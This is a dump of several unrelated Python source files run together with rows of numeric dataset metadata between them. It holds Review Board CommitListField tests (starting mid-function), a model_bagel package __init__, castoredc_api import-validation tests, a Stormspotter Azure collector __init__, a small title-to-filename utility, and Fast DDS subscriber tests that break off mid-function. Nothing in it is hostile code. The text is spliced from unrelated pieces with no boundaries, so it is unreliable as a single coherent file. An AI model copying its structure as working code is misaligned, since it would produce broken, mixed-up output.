' <td class="value"><pre>New commit message 2</pre></td>'
' <td class="value">%(name)s</td>'
' </tr>'
'</tbody>'
% {'name': submitter_name},
result)
def test_render_change_entry_html_with_author_new(self):
"""Testing CommitListField.render_change_entry_html with an author that
differs from the review request submitter in the new commits
"""
target = User.objects.get(username='doc')
repository = self.create_repository(tool_name='Git')
review_request = self.create_review_request(repository=repository,
target_people=[target],
public=True,
create_with_history=True)
diffset = self.create_diffset(review_request)
submitter_name = review_request.submitter.get_full_name()
self.create_diffcommit(diffset=diffset,
commit_id='r1',
parent_id='r0',
commit_message='Commit message 1',
author_name=submitter_name)
self.create_diffcommit(diffset=diffset,
commit_id='r2',
parent_id='r1',
commit_message='Commit message 2',
author_name=submitter_name)
draft_diffset = self.create_diffset(review_request, draft=True)
self.create_diffcommit(diffset=draft_diffset,
commit_id='r1',
parent_id='r0',
commit_message='New commit message 1',
author_name=submitter_name)
self.create_diffcommit(diffset=draft_diffset,
commit_id='r2',
parent_id='r1',
commit_message='New commit message 2',
author_name='Example Author')
draft_diffset.finalize_commit_series(
cumulative_diff=self.DEFAULT_GIT_FILEDIFF_DATA_DIFF,
validation_info=None,
validate=False,
save=True)
review_request.publish(user=review_request.submitter)
changedesc = review_request.changedescs.latest()
field = self._make_field(review_request)
result = field.render_change_entry_html(
changedesc.fields_changed[field.field_id])
self.assertInHTML('<colgroup><col><col><col></colgroup>', result)
self.assertInHTML(
'<thead>'
' <tr>'
' <th class="marker"></th>'
' <th>Summary</th>'
' <th>Author</th>'
' </tr>'
'</thead>',
result)
self.assertInHTML(
'<tbody>'
' <tr class="old-value">'
' <td class="marker">-</td>'
' <td class="value"><pre>Commit message 1</pre></td>'
' <td class="value">%(name)s</td>'
' </tr>'
' <tr class="old-value">'
' <td class="marker">-</td>'
' <td class="value"><pre>Commit message 2</pre></td>'
' <td class="value">%(name)s</td>'
' </tr>'
' <tr class="new-value">'
' <td class="marker">+</td>'
' <td class="value"><pre>New commit message 1</pre></td>'
' <td class="value">%(name)s</td>'
' </tr>'
' <tr class="new-value">'
' <td class="marker">+</td>'
' <td class="value"><pre>New commit message 2</pre></td>'
' <td class="value">Example Author</td>'
' </tr>'
'</tbody>'
% {'name': submitter_name},
result)
def test_serialize_change_entry(self):
"""Testing CommitListField.serialize_change_entry"""
target = User.objects.get(username='doc')
repository = self.create_repository(tool_name='Git')
review_request = self.create_review_request(repository=repository,
target_people=[target],
public=True,
create_with_history=True)
diffset = self.create_diffset(review_request)
submitter_name = review_request.submitter.get_full_name()
self.create_diffcommit(diffset=diffset,
commit_id='r1',
parent_id='r0',
commit_message='Commit message 1',
author_name=submitter_name)
self.create_diffcommit(diffset=diffset,
commit_id='r2',
parent_id='r1',
commit_message='Commit message 2',
author_name=submitter_name)
draft_diffset = self.create_diffset(review_request, draft=True)
self.create_diffcommit(diffset=draft_diffset,
commit_id='r1',
parent_id='r0',
commit_message='New commit message 1',
author_name=submitter_name)
self.create_diffcommit(diffset=draft_diffset,
commit_id='r2',
parent_id='r1',
commit_message='New commit message 2',
author_name='Example Author')
draft_diffset.finalize_commit_series(
cumulative_diff=self.DEFAULT_GIT_FILEDIFF_DATA_DIFF,
validation_info=None,
validate=False,
save=True)
review_request.publish(user=review_request.submitter)
changedesc = review_request.changedescs.latest()
field = self._make_field(review_request)
self.assertEqual(
{
'old': [
{
'author': submitter_name,
'summary': 'Commit message 1',
},
{
'author': submitter_name,
'summary': 'Commit message 2',
},
],
'new': [
{
'author': submitter_name,
'summary': 'New commit message 1',
},
{
'author': 'Example Author',
'summary': 'New commit message 2',
},
],
},
field.serialize_change_entry(changedesc))
def _make_field(self, review_request):
request = self.request_factory.get('/')
request.user = AnonymousUser()
data = ReviewRequestPageData(review_request, request)
data.query_data_pre_etag()
data.query_data_post_etag()
return CommitListField(review_request, request=request, data=data)
def _build_review_request_get(self, review_request):
"""Return an HTTP GET request for the review request.
This currently needs to exist because of a Django 1.6 issue. Once we're
on 1.8+ this method can go away.
Args:
review_request (reviewboard.reviews.models.review_request.
ReviewRequest):
The review request being tested.
Returns:
django.http.HttpRequest:
The request for the review request detail page.
"""
# XXX: Django 1.8 includes the resolver_match in test client requests.
url = review_request.get_absolute_url()
request = self.request_factory.get(url)
request.resolver_match = resolve(url)
return request
| 40.97338
| 79
| 0.506907
| 3,322
| 35,401
| 5.177303
| 0.056893
| 0.104308
| 0.018838
| 0.050235
| 0.921856
| 0.906622
| 0.897203
| 0.891854
| 0.888889
| 0.868946
| 0
| 0.006601
| 0.383746
| 35,401
| 863
| 80
| 41.020857
| 0.781766
| 0.062399
| 0
| 0.902158
| 0
| 0
| 0.203042
| 0.064016
| 0
| 0
| 0
| 0
| 0.051799
| 1
| 0.030216
| false
| 0
| 0.011511
| 0
| 0.047482
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
1ea84db5c0ee19f64cc65b841a69f8228d924e67
| 140
|
py
|
Python
|
KPIAnomaly/model_bagel/__init__.py
|
Nono17/AIOPS-Anomaly-Detection
|
1bfc49ccf1c1c852a45a8e4606a9a73550184005
|
[
"Apache-2.0"
] | 44
|
2021-05-21T14:30:12.000Z
|
2021-12-28T12:52:38.000Z
|
KPIAnomaly/model_bagel/__init__.py
|
Nono17/AIOPS-Anomaly-Detection
|
1bfc49ccf1c1c852a45a8e4606a9a73550184005
|
[
"Apache-2.0"
] | 1
|
2021-03-31T16:41:28.000Z
|
2021-03-31T16:41:28.000Z
|
KPIAnomaly/model_bagel/__init__.py
|
Nono17/AIOPS-Anomaly-Detection
|
1bfc49ccf1c1c852a45a8e4606a9a73550184005
|
[
"Apache-2.0"
] | 15
|
2021-03-29T13:16:56.000Z
|
2022-03-13T12:49:44.000Z
|
import model_bagel.data
import model_bagel.models
import model_bagel.testing
import model_bagel.utils
from model_bagel.models import Bagel
| 20
| 36
| 0.871429
| 22
| 140
| 5.318182
| 0.363636
| 0.42735
| 0.547009
| 0.376068
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.092857
| 140
| 6
| 37
| 23.333333
| 0.92126
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
1eab43b64217a0c1d0a3285d9a15b69d188e6d37
| 5,519
|
py
|
Python
|
castoredc_api/tests/test_import/test_async_import/test_import_validation_errors_async.py
|
reiniervlinschoten/castoredc_api
|
54a71606fa681a05e795e42a37d4b4f58b97e787
|
[
"MIT"
] | 1
|
2022-02-07T17:49:31.000Z
|
2022-02-07T17:49:31.000Z
|
castoredc_api/tests/test_import/test_async_import/test_import_validation_errors_async.py
|
reiniervlinschoten/castoredc_api
|
54a71606fa681a05e795e42a37d4b4f58b97e787
|
[
"MIT"
] | 48
|
2021-08-05T15:20:27.000Z
|
2022-03-28T14:49:25.000Z
|
castoredc_api/tests/test_import/test_async_import/test_import_validation_errors_async.py
|
reiniervlinschoten/castoredc_api
|
54a71606fa681a05e795e42a37d4b4f58b97e787
|
[
"MIT"
] | 1
|
2021-08-06T07:06:37.000Z
|
2021-08-06T07:06:37.000Z
|
import pytest
from castoredc_api import CastorException
from castoredc_api.importer.import_data import import_data
class TestImportValidationErrorsAsync:
"""Tests uploading data to Castor."""
def test_import_date_error(self, import_study):
"""Tests if uploading data with an error during the upload process fails properly"""
with pytest.raises(CastorException) as e:
import_data(
data_source_path="tests/test_import/data_files_for_import_tests/data_file_study_values_error_date.xlsx",
column_link_path="tests/test_import/link_files_for_import_tests/study_link_file.xlsx",
study=import_study,
label_data=False,
target="Study",
use_async=True,
)
assert str(e.value) == self.study_error
def test_import_datetime_error(self, import_study):
"""Tests if uploading data with an error during the upload process fails properly"""
with pytest.raises(CastorException) as e:
import_data(
data_source_path="tests/test_import/data_files_for_import_tests/data_file_study_values_error_datetime.xlsx",
column_link_path="tests/test_import/link_files_for_import_tests/study_link_file.xlsx",
study=import_study,
label_data=False,
target="Study",
use_async=True,
)
assert str(e.value) == self.study_error
def test_import_number_error(self, import_study):
"""Tests if uploading data with an error during the upload process fails properly"""
with pytest.raises(CastorException) as e:
import_data(
data_source_path="tests/test_import/data_files_for_import_tests/data_file_study_values_error_number.xlsx",
column_link_path="tests/test_import/link_files_for_import_tests/study_link_file.xlsx",
study=import_study,
label_data=False,
target="Study",
use_async=True,
)
assert str(e.value) == self.study_error
def test_import_numberdate_date_error(self, import_study):
"""Tests if uploading data with an error during the upload process fails properly"""
with pytest.raises(CastorException) as e:
import_data(
data_source_path="tests/test_import/data_files_for_import_tests/data_file_study_values_error_numberdate_date.xlsx",
column_link_path="tests/test_import/link_files_for_import_tests/study_link_file.xlsx",
study=import_study,
label_data=False,
target="Study",
use_async=True,
)
assert str(e.value) == self.study_error
def test_import_numberdate_number_error(self, import_study):
"""Tests if uploading data with an error during the upload process fails properly"""
with pytest.raises(CastorException) as e:
import_data(
data_source_path="tests/test_import/data_files_for_import_tests/data_file_study_values_error_numberdate_number.xlsx",
column_link_path="tests/test_import/link_files_for_import_tests/study_link_file.xlsx",
study=import_study,
label_data=False,
target="Study",
use_async=True,
)
assert str(e.value) == self.study_error
def test_import_optiongroup(self, import_study):
"""Tests if uploading data with an error during the upload process fails properly"""
with pytest.raises(CastorException) as e:
import_data(
data_source_path="tests/test_import/data_files_for_import_tests/data_file_study_values_error_optiongroup.xlsx",
column_link_path="tests/test_import/link_files_for_import_tests/study_link_file.xlsx",
study=import_study,
label_data=False,
target="Study",
use_async=True,
)
assert str(e.value) == self.study_error
def test_import_time_error(self, import_study):
"""Tests if uploading data with an error during the upload process fails properly"""
with pytest.raises(CastorException) as e:
import_data(
data_source_path="tests/test_import/data_files_for_import_tests/data_file_study_values_error_time.xlsx",
column_link_path="tests/test_import/link_files_for_import_tests/study_link_file.xlsx",
study=import_study,
label_data=False,
target="Study",
use_async=True,
)
assert str(e.value) == self.study_error
def test_import_year_error(self, import_study):
"""Tests if uploading data with an error during the upload process fails properly"""
with pytest.raises(CastorException) as e:
import_data(
data_source_path="tests/test_import/data_files_for_import_tests/data_file_study_values_error_year.xlsx",
column_link_path="tests/test_import/link_files_for_import_tests/study_link_file.xlsx",
study=import_study,
label_data=False,
target="Study",
use_async=True,
)
assert str(e.value) == self.study_error
study_error = (
"Non-viable data found in dataset to be imported. See output folder for details"
)
| 44.152
| 133
| 0.653017
| 682
| 5,519
| 4.920821
| 0.09824
| 0.071514
| 0.061979
| 0.090584
| 0.910012
| 0.910012
| 0.910012
| 0.910012
| 0.910012
| 0.910012
| 0
| 0
| 0.274325
| 5,519
| 124
| 134
| 44.508065
| 0.837953
| 0.12013
| 0
| 0.673684
| 0
| 0
| 0.281705
| 0.257173
| 0
| 0
| 0
| 0
| 0.084211
| 1
| 0.084211
| false
| 0
| 0.473684
| 0
| 0.578947
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
1eb008f7d48517cfcf8dbd33f50c5a6f05096718
| 104
|
py
|
Python
|
stormspotter/collector/assets/azure/__init__.py
|
ndrix/Stormspotter
|
4e999369d07aa88fc4803bb6e4c92b1ee78f97ef
|
[
"Apache-2.0",
"MIT"
] | 2
|
2020-05-29T21:49:44.000Z
|
2022-02-17T04:09:19.000Z
|
stormspotter/collector/assets/azure/__init__.py
|
avineshwar/Stormspotter
|
8e2f484dfcbed8397cb744d7be9e119a2d4a78fe
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
stormspotter/collector/assets/azure/__init__.py
|
avineshwar/Stormspotter
|
8e2f484dfcbed8397cb744d7be9e119a2d4a78fe
|
[
"Apache-2.0",
"MIT"
] | null | null | null |
import stormspotter.collector.assets.azure.rbac
import stormspotter.collector.assets.azure.azurewrapper
| 34.666667
| 55
| 0.884615
| 12
| 104
| 7.666667
| 0.583333
| 0.391304
| 0.586957
| 0.717391
| 0.826087
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.038462
| 104
| 2
| 56
| 52
| 0.92
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 9
|
94c2f42245c78dae479f60e8495f2428a0bab0ab
| 192
|
py
|
Python
|
utils.py
|
kchodorow/blook
|
09fa304af06b07b3de21635ca2faefd54f77244f
|
[
"Apache-2.0"
] | 3
|
2017-03-18T02:47:54.000Z
|
2021-05-13T05:36:38.000Z
|
utils.py
|
Jazielinc/blook
|
09fa304af06b07b3de21635ca2faefd54f77244f
|
[
"Apache-2.0"
] | 1
|
2018-03-23T08:35:54.000Z
|
2018-03-23T08:35:54.000Z
|
utils.py
|
Jazielinc/blook
|
09fa304af06b07b3de21635ca2faefd54f77244f
|
[
"Apache-2.0"
] | 2
|
2018-08-14T16:29:51.000Z
|
2021-05-13T05:36:40.000Z
|
import re
def title_to_filename(title):
title = title.replace(' ', '-')
return re.sub(r'[^-A-Za-z0-9_]', '', title)
def generate_uid(title):
return re.sub(r'[^A-Za-z0-9_]', '', title)
| 21.333333
| 45
| 0.614583
| 32
| 192
| 3.53125
| 0.5
| 0.176991
| 0.19469
| 0.212389
| 0.40708
| 0.40708
| 0.40708
| 0.40708
| 0.40708
| 0
| 0
| 0.024242
| 0.140625
| 192
| 8
| 46
| 24
| 0.660606
| 0
| 0
| 0
| 1
| 0
| 0.151042
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.333333
| false
| 0
| 0.166667
| 0.166667
| 0.833333
| 0
| 0
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 1
| 1
| 0
|
0
| 7
|
a2099c19e5b60fbd2111926fc4dc28e7c3abde43
| 22,104
|
py
|
Python
|
fastdds_python/test/api/test_subscriber.py
|
eProsima/Fast-DDS-python
|
b239bb52059aaba21c8eee94b67df1bd4a3d961b
|
[
"Apache-2.0"
] | 6
|
2021-12-15T07:52:35.000Z
|
2022-03-17T12:15:06.000Z
|
fastdds_python/test/api/test_subscriber.py
|
eProsima/Fast-DDS-python
|
b239bb52059aaba21c8eee94b67df1bd4a3d961b
|
[
"Apache-2.0"
] | 4
|
2022-02-18T03:21:55.000Z
|
2022-03-29T12:20:53.000Z
|
fastdds_python/test/api/test_subscriber.py
|
eProsima/Fast-DDS-python
|
b239bb52059aaba21c8eee94b67df1bd4a3d961b
|
[
"Apache-2.0"
] | 1
|
2021-12-17T18:14:32.000Z
|
2021-12-17T18:14:32.000Z
|
import fastdds
import pytest
import test_complete
import time
class SubscriberListener (fastdds.SubscriberListener):
def __init__(self):
super().__init__()
class DataReaderListener (fastdds.DataReaderListener):
def __init__(self):
super().__init__()
@pytest.fixture
def participant_qos():
return fastdds.DomainParticipantQos()
@pytest.fixture
def not_autoenable_participant_qos(participant_qos):
participant_qos.entity_factory().autoenable_created_entities = False
return participant_qos
@pytest.fixture
def participant(participant_qos):
factory = fastdds.DomainParticipantFactory.get_instance()
return factory.create_participant(0, participant_qos)
@pytest.fixture
def subscriber(participant, topic):
subscriber = participant.create_subscriber(
fastdds.SUBSCRIBER_QOS_DEFAULT)
yield subscriber
assert(fastdds.ReturnCode_t.RETCODE_OK ==
participant.delete_subscriber(subscriber))
assert(fastdds.ReturnCode_t.RETCODE_OK ==
participant.delete_topic(topic))
factory = fastdds.DomainParticipantFactory.get_instance()
assert(fastdds.ReturnCode_t.RETCODE_OK ==
factory.delete_participant(participant))
@pytest.fixture
def topic(participant):
test_type = fastdds.TypeSupport(
test_complete.CompleteTestTypePubSubType())
participant.register_type(test_type, test_type.get_type_name())
return participant.create_topic(
"Complete", test_type.get_type_name(), fastdds.TOPIC_QOS_DEFAULT)
@pytest.fixture
def test_type():
return fastdds.TypeSupport(
test_complete.CompleteTestTypePubSubType())
@pytest.fixture
def writer_participant():
factory = fastdds.DomainParticipantFactory.get_instance()
return factory.create_participant(
0, fastdds.PARTICIPANT_QOS_DEFAULT)
@pytest.fixture
def writer_topic(writer_participant, test_type):
writer_participant.register_type(test_type, test_type.get_type_name())
return writer_participant.create_topic(
"Complete", test_type.get_type_name(), fastdds.TOPIC_QOS_DEFAULT)
@pytest.fixture
def publisher(writer_participant):
return writer_participant.create_publisher(fastdds.PUBLISHER_QOS_DEFAULT)
def test_access(subscriber):
"""
This test checks:
- ::resume_publications
"""
assert(fastdds.ReturnCode_t.RETCODE_UNSUPPORTED ==
subscriber.begin_access())
assert(fastdds.ReturnCode_t.RETCODE_UNSUPPORTED ==
subscriber.end_access())
def test_create_datareader(topic, subscriber):
"""
This test checks:
- Subscriber::create_datareader
- Subscriber::delete_datareader
- DataReader::get_status_mask
- StatusMask::operator ==
- StatusMask::operator <<
"""
listener = DataReaderListener()
assert(listener is not None)
# Overload 1
datareader = subscriber.create_datareader(
topic, fastdds.DATAREADER_QOS_DEFAULT)
assert(datareader is not None)
assert(datareader.is_enabled())
assert(fastdds.StatusMask.all() == datareader.get_status_mask())
assert(fastdds.ReturnCode_t.RETCODE_OK ==
subscriber.delete_datareader(datareader))
# Overload 2
datareader = subscriber.create_datareader(
topic, fastdds.DATAREADER_QOS_DEFAULT, listener)
assert(datareader is not None)
assert(datareader.is_enabled())
assert(fastdds.StatusMask.all() == datareader.get_status_mask())
assert(fastdds.ReturnCode_t.RETCODE_OK ==
subscriber.delete_datareader(datareader))
def test(status_mask_1, status_mask_2, listnr=None):
"""
Test the entity creation using the two types of StatusMasks.
"""
datareader = subscriber.create_datareader(
topic, fastdds.DATAREADER_QOS_DEFAULT, listnr, status_mask_1)
assert(datareader is not None)
assert(datareader.is_enabled())
assert(status_mask_1 == datareader.get_status_mask())
assert(fastdds.ReturnCode_t.RETCODE_OK ==
subscriber.delete_datareader(datareader))
datareader = subscriber.create_datareader(
topic, fastdds.DATAREADER_QOS_DEFAULT, listnr, status_mask_2)
assert(datareader is not None)
assert(datareader.is_enabled())
assert(status_mask_2 == datareader.get_status_mask())
assert(fastdds.ReturnCode_t.RETCODE_OK ==
subscriber.delete_datareader(datareader))
# Overload 3: Different status masks
test(fastdds.StatusMask.all(), fastdds.StatusMask_all(), None)
test(fastdds.StatusMask.all(), fastdds.StatusMask_all(), listener)
test(fastdds.StatusMask.none(), fastdds.StatusMask_none(), listener)
test(fastdds.StatusMask.data_available(),
fastdds.StatusMask_data_available(), listener)
test(fastdds.StatusMask.data_on_readers(),
fastdds.StatusMask_data_on_readers(), listener)
test(fastdds.StatusMask.inconsistent_topic(),
fastdds.StatusMask_inconsistent_topic(), listener)
test(fastdds.StatusMask.liveliness_changed(),
fastdds.StatusMask_liveliness_changed(), listener)
test(fastdds.StatusMask.liveliness_lost(),
fastdds.StatusMask_liveliness_lost(), listener)
test(fastdds.StatusMask.offered_deadline_missed(),
fastdds.StatusMask_offered_deadline_missed(), listener)
test(fastdds.StatusMask.offered_incompatible_qos(),
fastdds.StatusMask_offered_incompatible_qos(), listener)
test(fastdds.StatusMask.publication_matched(),
fastdds.StatusMask_publication_matched(), listener)
test(fastdds.StatusMask.requested_deadline_missed(),
fastdds.StatusMask_requested_deadline_missed(), listener)
test(fastdds.StatusMask.requested_incompatible_qos(),
fastdds.StatusMask_requested_incompatible_qos(), listener)
test(fastdds.StatusMask.sample_lost(),
fastdds.StatusMask_sample_lost(), listener)
test(fastdds.StatusMask.sample_rejected(),
fastdds.StatusMask_sample_rejected(), listener)
test(fastdds.StatusMask.subscription_matched(),
fastdds.StatusMask_subscription_matched(), listener)
m = fastdds.StatusMask_data_available() << \
fastdds.StatusMask_data_on_readers() << \
fastdds.StatusMask_inconsistent_topic() << \
fastdds.StatusMask_liveliness_changed() << \
fastdds.StatusMask_liveliness_lost() << \
fastdds.StatusMask_offered_deadline_missed() << \
fastdds.StatusMask_offered_incompatible_qos() << \
fastdds.StatusMask_publication_matched() << \
fastdds.StatusMask_requested_deadline_missed() << \
fastdds.StatusMask_requested_incompatible_qos() << \
fastdds.StatusMask_sample_lost() << \
fastdds.StatusMask_sample_rejected() << \
fastdds.StatusMask_subscription_matched()
test(fastdds.StatusMask.data_available() <<
fastdds.StatusMask.data_on_readers() <<
fastdds.StatusMask.inconsistent_topic() <<
fastdds.StatusMask.liveliness_changed() <<
fastdds.StatusMask.liveliness_lost() <<
fastdds.StatusMask.offered_deadline_missed() <<
fastdds.StatusMask.offered_incompatible_qos() <<
fastdds.StatusMask.publication_matched() <<
fastdds.StatusMask.requested_deadline_missed() <<
fastdds.StatusMask.requested_incompatible_qos() <<
fastdds.StatusMask.sample_lost() <<
fastdds.StatusMask.sample_rejected() <<
fastdds.StatusMask.subscription_matched(),
m,
listener)
def test_create_datareader_with_profile(topic, subscriber):
"""
This test checks:
- Subscriber::create_datareader
- Subscriber::delete_datareader
- DataReader::get_status_mask
- StatusMask::operator ==
- StatusMask::operator <<
"""
listener = DataReaderListener()
assert(listener is not None)
# Failure
datareader = subscriber.create_datareader_with_profile(
topic, 'no_exits_profile')
assert(datareader is None)
# Overload 1
datareader = subscriber.create_datareader_with_profile(
topic, 'test_datareader_profile')
assert(datareader is not None)
assert(datareader.is_enabled())
qos = datareader.get_qos()
assert(fastdds.RELIABLE_RELIABILITY_QOS ==
qos.reliability().kind)
assert(fastdds.StatusMask.all() == datareader.get_status_mask())
assert(fastdds.ReturnCode_t.RETCODE_OK ==
subscriber.delete_datareader(datareader))
# Overload 2
datareader = subscriber.create_datareader_with_profile(
topic, 'test_datareader_profile', listener)
assert(datareader is not None)
assert(datareader.is_enabled())
qos = datareader.get_qos()
assert(fastdds.RELIABLE_RELIABILITY_QOS ==
qos.reliability().kind)
assert(fastdds.StatusMask.all() == datareader.get_status_mask())
assert(fastdds.ReturnCode_t.RETCODE_OK ==
subscriber.delete_datareader(datareader))
def test(status_mask_1, status_mask_2, listnr=None):
"""
Test the entity creation using the two types of StatusMasks.
"""
datareader = subscriber.create_datareader_with_profile(
topic, 'test_datareader_profile', listnr, status_mask_1)
assert(datareader is not None)
assert(datareader.is_enabled())
qos = datareader.get_qos()
assert(fastdds.RELIABLE_RELIABILITY_QOS ==
qos.reliability().kind)
assert(status_mask_1 == datareader.get_status_mask())
assert(fastdds.ReturnCode_t.RETCODE_OK ==
subscriber.delete_datareader(datareader))
datareader = subscriber.create_datareader_with_profile(
topic, 'test_datareader_profile', listnr, status_mask_2)
assert(datareader is not None)
assert(datareader.is_enabled())
assert(fastdds.RELIABLE_RELIABILITY_QOS ==
qos.reliability().kind)
assert(status_mask_2 == datareader.get_status_mask())
assert(fastdds.ReturnCode_t.RETCODE_OK ==
subscriber.delete_datareader(datareader))
# Overload 3: Different status masks
test(fastdds.StatusMask.all(), fastdds.StatusMask_all(), None)
test(fastdds.StatusMask.all(), fastdds.StatusMask_all(), listener)
test(fastdds.StatusMask.none(), fastdds.StatusMask_none(), listener)
test(fastdds.StatusMask.data_available(),
fastdds.StatusMask_data_available(), listener)
test(fastdds.StatusMask.data_on_readers(),
fastdds.StatusMask_data_on_readers(), listener)
test(fastdds.StatusMask.inconsistent_topic(),
fastdds.StatusMask_inconsistent_topic(), listener)
test(fastdds.StatusMask.liveliness_changed(),
fastdds.StatusMask_liveliness_changed(), listener)
test(fastdds.StatusMask.liveliness_lost(),
fastdds.StatusMask_liveliness_lost(), listener)
test(fastdds.StatusMask.offered_deadline_missed(),
fastdds.StatusMask_offered_deadline_missed(), listener)
test(fastdds.StatusMask.offered_incompatible_qos(),
fastdds.StatusMask_offered_incompatible_qos(), listener)
test(fastdds.StatusMask.publication_matched(),
fastdds.StatusMask_publication_matched(), listener)
test(fastdds.StatusMask.requested_deadline_missed(),
fastdds.StatusMask_requested_deadline_missed(), listener)
test(fastdds.StatusMask.requested_incompatible_qos(),
fastdds.StatusMask_requested_incompatible_qos(), listener)
test(fastdds.StatusMask.sample_lost(),
fastdds.StatusMask_sample_lost(), listener)
test(fastdds.StatusMask.sample_rejected(),
fastdds.StatusMask_sample_rejected(), listener)
test(fastdds.StatusMask.subscription_matched(),
fastdds.StatusMask_subscription_matched(), listener)
m = fastdds.StatusMask_data_available() << \
fastdds.StatusMask_data_on_readers() << \
fastdds.StatusMask_inconsistent_topic() << \
fastdds.StatusMask_liveliness_changed() << \
fastdds.StatusMask_liveliness_lost() << \
fastdds.StatusMask_offered_deadline_missed() << \
fastdds.StatusMask_offered_incompatible_qos() << \
fastdds.StatusMask_publication_matched() << \
fastdds.StatusMask_requested_deadline_missed() << \
fastdds.StatusMask_requested_incompatible_qos() << \
fastdds.StatusMask_sample_lost() << \
fastdds.StatusMask_sample_rejected() << \
fastdds.StatusMask_subscription_matched()
test(fastdds.StatusMask.data_available() <<
fastdds.StatusMask.data_on_readers() <<
fastdds.StatusMask.inconsistent_topic() <<
fastdds.StatusMask.liveliness_changed() <<
fastdds.StatusMask.liveliness_lost() <<
fastdds.StatusMask.offered_deadline_missed() <<
fastdds.StatusMask.offered_incompatible_qos() <<
fastdds.StatusMask.publication_matched() <<
fastdds.StatusMask.requested_deadline_missed() <<
fastdds.StatusMask.requested_incompatible_qos() <<
fastdds.StatusMask.sample_lost() <<
fastdds.StatusMask.sample_rejected() <<
fastdds.StatusMask.subscription_matched(),
m,
listener)
def test_delete_contained_entities(participant, topic, subscriber):
"""
This test checks:
- Subscriber::delete_contained_entities
"""
datareader = subscriber.create_datareader(
topic, fastdds.DATAREADER_QOS_DEFAULT)
assert(datareader is not None)
# Cannot delete subscriber with datareaders
assert(fastdds.ReturnCode_t.RETCODE_PRECONDITION_NOT_MET ==
participant.delete_subscriber(subscriber))
assert(fastdds.ReturnCode_t.RETCODE_OK ==
subscriber.delete_contained_entities())
assert(subscriber.has_datareaders() is False)
def test_enable(not_autoenable_participant_qos, subscriber):
"""
This test checks:
- Subscriber::enable
- Subscriber::is_enabled
"""
assert(not subscriber.is_enabled())
assert(fastdds.ReturnCode_t.RETCODE_OK ==
subscriber.enable())
assert(subscriber.is_enabled())
def test_get_datareaders(topic, subscriber):
"""
This test checks:
- Subscriber::get_datareaders
- Subscriber::has_datareaders
"""
datareader = subscriber.create_datareader(
topic, fastdds.DATAREADER_QOS_DEFAULT)
assert(datareader is not None)
assert(subscriber.has_datareaders())
datareaders = fastdds.DataReaderVector()
assert(subscriber.get_datareaders(datareaders))
assert(1 == len(datareaders))
assert(datareader == datareaders[0])
assert(fastdds.ReturnCode_t.RETCODE_OK ==
subscriber.delete_datareader(datareader))
def test_get_instance_handle(participant, subscriber):
"""
This test checks:
- Subscriber::get_instance_handle
- Subscriber::guid
"""
ih = subscriber.get_instance_handle()
assert(ih is not None)
assert(ih.isDefined())
guid = participant.guid()
assert(guid is not None)
assert(ih != fastdds.c_InstanceHandle_Unknown)
assert(guid != fastdds.c_Guid_Unknown)
for i in range(0, 12):
assert(guid.guidPrefix.value[i] == ih.value[i])
def test_get_participant(participant, subscriber):
"""
This test checks:
- Subscriber::get_participant
"""
participant2 = subscriber.get_participant()
assert(participant2 is not None)
assert(participant == participant2)
def test_get_set_qos(subscriber):
"""
This test checks:
- Subscriber::get_qos
- Subscriber::set_qos
"""
qos = fastdds.SubscriberQos()
qos.partition().push_back('PartitionTest')
qos.partition().push_back('PartitionTest2')
assert(fastdds.ReturnCode_t.RETCODE_OK ==
subscriber.set_qos(qos))
qos2 = fastdds.SubscriberQos()
assert(fastdds.ReturnCode_t.RETCODE_OK ==
subscriber.get_qos(qos2))
def test_get_set_listener(subscriber):
"""
This test checks:
- Publisher::get_listener
- Publisher::set_listener
- Publisher::get_status_mask
- StatusMask::operator ==
- StatusMask::operator <<
"""
# Overload 1
listener = SubscriberListener()
assert(listener is not None)
assert(fastdds.ReturnCode_t.RETCODE_OK ==
subscriber.set_listener(listener))
assert(subscriber.get_listener() == listener)
assert(fastdds.StatusMask.all() == subscriber.get_status_mask())
def test(status_mask_1, status_mask_2):
"""
Test the entity creation using the two types of StatusMasks.
"""
listener = SubscriberListener()
assert(listener is not None)
assert(fastdds.ReturnCode_t.RETCODE_OK ==
subscriber.set_listener(listener, status_mask_1))
assert(subscriber.get_listener() == listener)
assert(status_mask_1 == subscriber.get_status_mask())
listener = SubscriberListener()
assert(listener is not None)
assert(fastdds.ReturnCode_t.RETCODE_OK ==
subscriber.set_listener(listener, status_mask_2))
assert(subscriber.get_listener() == listener)
assert(status_mask_2 == subscriber.get_status_mask())
# Overload 2: Different status masks
test(fastdds.StatusMask.all(), fastdds.StatusMask_all())
